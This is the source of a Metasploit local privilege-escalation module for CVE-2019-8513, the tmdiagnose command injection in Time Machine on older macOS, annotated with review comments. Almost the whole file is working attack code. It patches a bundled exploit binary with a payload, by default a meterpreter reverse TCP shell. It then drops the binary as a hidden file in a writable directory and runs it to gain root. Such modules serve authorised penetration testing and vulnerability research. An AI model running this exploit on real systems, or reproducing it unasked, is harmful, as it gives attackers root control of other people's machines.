Path: blob/master/modules/exploits/osx/local/timemachine_cmd_injection.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Local privilege escalation for CVE-2019-8513 (tmdiagnose command injection).
#
# Flow, as implemented below: a version gate (`check`), three pre-flight
# refusals in `exploit`, patching of a bundled exploit binary with the
# selected payload, upload of that binary as a hidden file under WritableDir,
# and execution of it through the existing session. The dropped file is
# registered with FileDropper so the framework removes it afterwards.
class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::OSX::Priv
  include Msf::Post::OSX::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  # Registers module metadata and the single advanced option this module reads.
  #
  # @param info [Hash] metadata merged by the framework via +update_info+
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Mac OS X TimeMachine (tmdiagnose) Command Injection Privilege Escalation',
        'Description' => %q{
          This module exploits a command injection in TimeMachine on macOS <= 10.14.3 in
          order to run a payload as root. The tmdiagnose binary on OSX <= 10.14.3 suffers
          from a command injection vulnerability that can be exploited by creating a
          specially crafted disk label.

          The tmdiagnose binary uses awk to list every mounted volume, and composes
          shell commands based on the volume labels. By creating a volume label with the
          backtick character, we can have our own binary executed with root priviledges.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'CodeColorist', # Discovery and exploit
          'timwr', # Metasploit module
        ],
        'References' => [
          ['CVE', '2019-8513'],
          ['URL', 'http://web.archive.org/web/20201113192302/https://medium.com/0xcc/rootpipe-reborn-part-i-cve-2019-8513-timemachine-root-command-injection-47e056b3cb43'],
          ['URL', 'https://support.apple.com/en-in/HT209600'],
          ['URL', 'https://github.com/ChiChou/sploits'],
        ],
        'DefaultTarget' => 0,
        # WfsDelay is raised to 300 s; the module itself does not explain why,
        # presumably because the injected command is only run once tmdiagnose
        # is triggered — confirm against the bundled exploit's behaviour.
        'DefaultOptions' => { 'WfsDelay' => 300, 'PAYLOAD' => 'osx/x64/meterpreter/reverse_tcp' },
        # Target 0 embeds an encoded native payload; the other two embed a
        # command string prefixed with "CMD:" (see `exploit`).
        'Targets' => [
          [ 'Mac OS X x64 (Native Payload)', { 'Arch' => ARCH_X64, 'Platform' => [ 'osx' ] } ],
          [ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],
          [ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ],
        ],
        'DisclosureDate' => '2019-04-13',
        # Reliability, stability and side effects are all declared UNKNOWN;
        # nothing in this file narrows them.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
    # WritableDir: where the patched exploit binary is dropped. Only its
    # writability is checked in `exploit`; whether it is mounted noexec is not.
    register_advanced_options [
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
    ]
  end

  # Writes +filedata+ to +filepath+ on the target, marks it executable and
  # queues it for removal by FileDropper.
  #
  # @param filepath [String] absolute path on the target
  # @param filedata [String] file contents (binary-safe via +write_file+)
  # @return [void]
  def upload_executable_file(filepath, filedata)
    print_status("Uploading file: '#{filepath}'")
    write_file(filepath, filedata)
    # chmod is called with no mode argument, so the mixin's default applies.
    chmod(filepath)
    # Cleanup is best-effort and happens later; the file exists on disk for
    # the whole run, which is the main host artifact this module leaves.
    register_file_for_cleanup(filepath)
  end

  # Version-only gate: anything below 10.14.4 is reported as Appears.
  #
  # This does not verify that tmdiagnose is present or that the bundled
  # exploit binary is usable on the target, hence Appears rather than
  # Vulnerable.
  #
  # @return [Msf::Exploit::CheckCode] Safe on 10.14.4 and later, Appears otherwise
  def check
    version = Rex::Version.new(get_system_version)
    if version >= Rex::Version.new('10.14.4')
      CheckCode::Safe
    else
      CheckCode::Appears
    end
  end

  # Patches the bundled exploit binary with the selected payload, uploads it
  # and runs it through the current session.
  #
  # Pre-flight refusals, in order: version gate, session already root,
  # WritableDir not writable. Each one raises via +fail_with+.
  #
  # @raise [Msf::Exploit::Failed] via +fail_with+ on any pre-flight or size failure
  # @return [void]
  def exploit
    if check != CheckCode::Appears
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
    end

    if is_root?
      fail_with Failure::BadConfig, 'Session already has root privileges'
    end

    unless writable? datastore['WritableDir']
      fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
    end

    # The exploit binary ships with the framework's data directory; it is
    # read as raw bytes so the placeholder splice below is byte-based.
    exploit_data = File.binread(File.join(Msf::Config.data_directory, "exploits", "CVE-2019-8513", "exploit"))
    if target['Arch'] == ARCH_X64
      # Native target: the encoded payload bytes are embedded as-is.
      root_cmd = payload.encoded
    else
      # Command-style targets: the raw command is wrapped with a "CMD:" prefix,
      # which the bundled binary presumably recognises — not verifiable here.
      root_cmd = payload.raw
      if target['Arch'] == ARCH_PYTHON
        # NOTE(review): the raw payload is interpolated inside a double-quoted
        # shell string; a payload containing `"` or `$` would break the
        # command. Consider a quoting helper if this target is exercised.
        root_cmd = "echo \"#{root_cmd}\" | python"
      end
      root_cmd = "CMD:#{root_cmd}"
    end
    # NOTE(review): the size limit is compared with String#length (characters),
    # while the splice below operates on a binary string; for non-ASCII
    # payloads bytesize would be the safer measure.
    if root_cmd.length > 1024
      fail_with Failure::PayloadFailed, "Payload size (#{root_cmd.length}) exceeds space in payload placeholder"
    end

    # NOTE(review): `index` returns nil if the placeholder is missing from the
    # data file (e.g. a corrupted or replaced binary), and the next line would
    # then raise a TypeError rather than a clear fail_with message.
    placeholder_index = exploit_data.index('ROOT_PAYLOAD_PLACEHOLDER')
    # Overwrites exactly root_cmd.length bytes starting at the placeholder;
    # the remainder of the 1024-byte region is left as it was in the file.
    exploit_data[placeholder_index, root_cmd.length] = root_cmd

    # Hidden file with a random lowercase name under WritableDir.
    exploit_file = "#{datastore['WritableDir']}/.#{Rex::Text::rand_text_alpha_lower(6..12)}"
    upload_executable_file(exploit_file, exploit_data)

    # The binary is run via the session; its stdout is echoed back but not
    # interpreted, so success is ultimately judged by whether a new session
    # arrives within WfsDelay.
    print_status("Executing exploit '#{exploit_file}'")
    result = cmd_exec(exploit_file)
    print_status("Exploit result:\n#{result}")
  end
end